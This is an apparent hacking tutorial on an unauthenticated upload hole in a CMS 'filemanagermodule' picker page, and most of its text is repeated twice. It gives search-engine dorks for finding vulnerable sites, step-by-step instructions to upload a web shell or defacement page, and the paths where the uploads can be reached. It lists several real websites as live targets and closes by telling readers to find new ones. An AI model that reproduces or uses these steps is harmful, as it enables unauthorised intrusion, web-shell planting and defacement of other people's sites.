"Testing Image collection" shell and files upload vulnrablity
Dorks : inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
intitle:"Testing Image Collections"
Goto Google or Bing and Type Dork inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or intitle:"Testing Image Collections"
now see search results in google or bing search ..
select any site from search results and look for upload option
here is demo of upload button :
Now select your shell or deface page and upload it
To view your upload shell or deface go to:
http://website.com/files/yourfilehere or
http://websites.com/path/yourfilehere
Live Demo :
http://www.bantamorloff.co.uk/modules/filemanagermodule/actions/picker.php?id=&highlight_file=472
result : http://www.bantamorloff.co.uk/files/backlinks.html
other live examples :
Dorks : inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
intitle:"Testing Image Collections"
Goto Google or Bing and Type Dork inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or intitle:"Testing Image Collections"
now see search results in google or bing search ..
select any site from search results and look for upload option
here is demo of upload button :
Now select your shell or deface page and upload it
To view your upload shell or deface go to:
http://website.com/files/yourfilehere or
http://websites.com/path/yourfilehere
Live Demo :
http://www.bantamorloff.co.uk/modules/filemanagermodule/actions/picker.php?id=&highlight_file=472
result : http://www.bantamorloff.co.uk/files/backlinks.html
other live examples :
http://www.admiralfc.co.uk/modules/filemanagermodule/actions/picker.php?id=0
http://www.dogandduckfc.com/newsite/modules/filemanagermodule/actions/picker.php?id=0
*UPDATE : Demo sites are patched now Find a new target >:D<